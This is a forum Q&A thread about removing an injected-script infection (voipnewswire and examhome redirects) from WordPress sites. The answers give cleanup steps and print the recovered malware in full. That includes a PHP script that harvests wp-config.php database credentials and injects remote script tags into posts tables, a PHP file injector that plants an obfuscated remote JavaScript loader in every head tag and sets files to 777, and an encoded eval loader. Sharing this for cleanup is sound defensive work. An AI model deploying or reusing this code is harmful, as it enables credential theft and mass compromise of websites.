# How to delete script injected on wordpress site: ads.voipnewswire.net?

Tags: wordpress, ads, malware

My wordpress site has this scripts all over the place, I deleted a lot of them but there are still being redirections to some malware ads.

Do someone know how to fix this thing?

The scripts have this link: ads.voipnewswire.net

Comment: Best suited question for https://security.stackexchange.com/

Comment: It could be caused because of poor coding (security wise) or many other factors, you could get better help in other Stack Exchange sites.

Comment: since 3 days I got the exact problem. The malware, even after deleting all .php and .js infected in the wordpress instance, keeps returning. The second day I found that all the posts in WP database, table wp_posts are full of the script with voipnewswire link. I so deleted all the script from the posts, they are now, at the third day, clean. The problem is that this morning, third day, I still see many of my domain and subdomain back with all the php and js files full of the code: <script language=javascript>eval(String.fromCharCode(118, 97, 114, 32 ..... Now I'm changing all the htaccess pwd,

Answer (score 14):

I had the same issue on two of my pages this morning and after investigate a lot in my files and DB, I found what the malware did was change my js files adding an encoded script and adding another script at the end of each post on the wp_posts table on my DB.

I solved the problem with basically two steps:

**First:** go to your DB (Mysql) with PHPMyadmin or with any client and type:

```
UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>", " ")
```

what it does is delete all the occurrences of the malware injection on your table.

*Note:* the "?ver=1.0.5" part of the search can change, check your page code with "Ctrl+U" when it starts to load and before the redirect, search for "cdn.examhome.net" or "ads.voipnewswire.net" or "eval(String.fromCharCode..." and check the version of the malware js in order to change it on the db query above.

**Second:** go to your file manager and compress all your files in a zip or similar. download the compressed file and extract on your computer, use Notepad++ (sublimetext and others can help, but i recommend Notepad++) and use the advanced search on that directory to replace this in all documents for empty or a blankspace:

[this is an image of how the replacement looks on Notepad++ (in Spanish)](https://i.stack.imgur.com/cz3GF.png)

```
eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125));
```

*Note:* the numbers inside can change, but they always start with  eval(String.fromCharCode(, and don't worry, none of the core js of wordpress or plugin uses this, so you can search any match and copy the numbers inside to complete the replace statement.

then compress it again, delete all your public_html content and reupload the compress file and extract it on the public_html root and is done.

With this everything returned to the normality for my two Wordpress pages, Hope it can Help you. Good luck!

Answer (score 2):

I helped a friend with this issue and dicided to help a community with the experience i had in order to solve this nasty malware in WordPress files ,I discovered that malware being injected into one of the folders in my case  /wp-content/uploads/ folder as a file with no extension .

I discovered two files (php files)  :

first file expose the "wp-config.php" with all the keys and DB details and injects the examhome.net script into the post_content table - below is the code  .

```
    <?php echo ":#009009#:";
    $file_to_search = "wp-config.php";

    @search_file($_SERVER['DOCUMENT_ROOT']."/../../../../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/../../../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/../../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT'],$file_to_search);

    function search_file($dir,$file_to_search){

    $files = scandir($dir);

    foreach($files as $key => $value){

        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);

        if(!is_dir($path)) {
            if (strpos($value,$file_to_search) !== false) {

                show_sitenames($path);



            }

        } else if($value != "." && $value != "..") {

            search_file($path, $file_to_search);

        }  
     } 
    }

    echo ":#009009#:";



    function show_sitenames($file){
        $content = @file_get_contents($file);
        if(strpos($content, "DB_NAME") !== false) {


        $db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
        $host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
        $user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
        $pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);


    // Create connection
    $conn = new mysqli($host, $user, $pass);

    // Check connection
    if ($conn->connect_error) {
      echo $conn->connect_error;
    } else { 


    $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
    $result = $conn->query($q);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
            $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
        $result2 = $conn->query($q2);
        if ($result2->num_rows > 0) {
            while($row2 = $result2->fetch_assoc()) {
                $val = $row2['post_content'];
                if(strpos($val, "examhome") === false){

                    echo "nothing:".$file."\n";

                    $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://cdn.examhome.net/cdn.js?ver=1.0.88' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%examhome%'";
                    $conn->query($q3);

                } else {

                    echo "already exist:".$file."\n";
                }
            }
        } else {
        }
        }
    } else {
    }
    $conn->close();
    }
    }
    }

    function get_var_reg($pat,$text) {

        if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
        {
            return $matches[1][0];
        }

        return "";
    }


    exit();
```

And the second file when executed is injecting the code below ( js script  ) into the js files recursively  into the "head" section everywhere . 
The script also change the permissions of the files to 777 meaning read and write

At this stage your system is already compromised and it doesn't matter how many times you remove the script from the files they have full access to the system because of the "wp-config.php" details which compromised earlier meaning that they now can access your wp-admin .

```
<?php $a = 'find / -type f -name "*" | xargs grep -rl "<head"';
$l1 = '<script language=javascript>var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 108, 101, 97, 114, 110, 105, 110, 103, 116, 111, 111, 108, 107, 105, 116, 46, 99, 108, 117, 98, 47, 108, 105, 110, 107, 46, 112, 104, 112, 63, 118, 101, 114, 61, 49);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))>  -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}</script>';



$t = shell_exec($a);
$t = explode("\n", trim($t));
foreach($t as $f){

$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
   echo "e:".$f;
} else {
$g = file_get_contents($f);
$g = str_replace("<head>","<head>".$l1,$g);
$g = str_replace("</head>",$l1."</head>",$g);
@system("chmod 777 ".$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
   echo $f;
} 
}
}
echo ":#009009#:";
```

It's important that you don't use the duplicator plugin as it seems it has a SQL injection hole , if you do have it in your system remove it . 
You can use grep command to identify the infected files like this :

- sudo grep -rl "examhome.net" /var/www/html/ | more
- sudo grep -r "eval(String.fromCharCode(118, 97 " /var/www/html/ | more
- and finally using grep and sed command you can identify and replace the infected code with space .

I really hope this could help others to solve this issue it's not a final solution since this malware worm is being updated and i'm still investigating this issue .

Dave

Disclaimer : Use of the information in this post is your responsibility only!

Answer (score 2):

Most common issue is an injection to the wp_options table, a column that goes like

```
eval(String.fromCharCode(118, 97, 114, 32, 100,
```

So to find this first export your database , open it with an editor and search for string "eval(String.fromCharCode(118, 97, 114, 32, 100," , next step is to delete the row with that string from the database , most likely you might find it in wp_options table

Comment: sorry meant a row that goes like eval(String.fromCharCode(118, 97, 114, 32, 100,

Answer (score 1):

Since it is clear you have been breached, I would first recommend reverting to a backup of the site prior to the breach (if you have one).

Next, I would recommend changing all of your passwords for the site (hosting, ftp, database, Wordpress, etc).

If you have no backup, I would then follow up by inspecting every PHP (and possibly Javascript) file in your Wordpress installation (including plugins and templates) to find if there are other places this include is being put on the site.

Finally, if you have no backup, I would inspect any posts, pages, and comments to ensure no includes have been added to the content (just to be sure).

Answer (score 0):

You can follow this approach but be careful:

take the backup of your wordpress database first then open that backup.sql file in any code editor like notepad++ etc then there search for string like "https://s2.voipnewswire.net/s2.js\' type=\'text/javascript\'>" and replace all its occurrences with blank space your problem is solved.

now the malicious script is removed from all your wordpress site content and same you can do for your other website files.

Answer (score 0):

My wordpress cache (wp-content/cache/page_enhanced/) keep generating home page and other pages with unsafe scripts from others.

ex:
`/wp-content/i.php?ver=5.5.1(www.rocpellami.com) /plugins/i.php?ver=5.5.1(www.brpets.com) /modules/i.php?ver=5.5.1(cartavariada.com) /wp-content/i.php?ver=5.5.1(zazalanoisette.com)`

Can those injected files when I view page source.

Answer (score 0):

Try this.

From your wp admin dashboard, go to theme editor > theme-header.php file (or something like this) to find and delete the injected script in the.

If you are using a child theme, make sure you navigate to parent theme first.